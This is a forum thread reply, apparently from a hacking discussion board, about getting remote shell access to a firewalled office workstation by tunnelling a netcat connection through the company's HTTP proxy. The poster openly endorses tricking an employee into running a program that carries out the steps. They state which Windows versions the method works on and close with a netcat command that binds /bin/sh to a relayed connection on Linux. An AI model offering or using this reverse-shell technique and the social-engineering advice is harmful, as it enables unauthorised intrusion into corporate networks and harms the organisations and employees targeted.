Originally posted here by PuReExcTacy

If you can already do this, then what exactly are you gaining, you've already got shell access. Hell, from here, you can install whatever you want. And whatever remote admin tool you'd like.
But what if the victim's machine (10.0.4.15) is on a LAN and has no full Internet access except access to a single HTTP proxy server (10.0.0.4) for web browsing?

It's impossible to run a trojan/backdoor on the victim's machine and expect to connect or even reach the victim's machine from outside the LAN.

This method is for a hacker who already has physical access to the firewalled host, e.g. an employee of a company who wants access to his work workstation from home OR a hacker who fools an employee of the company to download and execute a program that is programmed to automatically carry out steps 2 & 3.

Originally posted here by PuReExcTacy

At that, I wouldn't set netcat to listen on my own box. That's just an invitation for someone else to check out your box.
eh? The netcat running on the attacker's host? That only opens port 443 and waits for someone to connect to the port. Not serving any data.

Originally posted here by fl34bit3
Thanks for the info. It shows thought that it is a win xp computer is it only for xp or possible on others.
This method will work on Windows 2000 but not on the Windows 9x series.

I did try it on a Linux host but the Linux port of Bouncer gave me a "Segmentation Fault" error.
But in theory, it should work on Linux if you do this instead for Step 3:
Code:
./nc -e /bin/sh 127.0.0.1 9999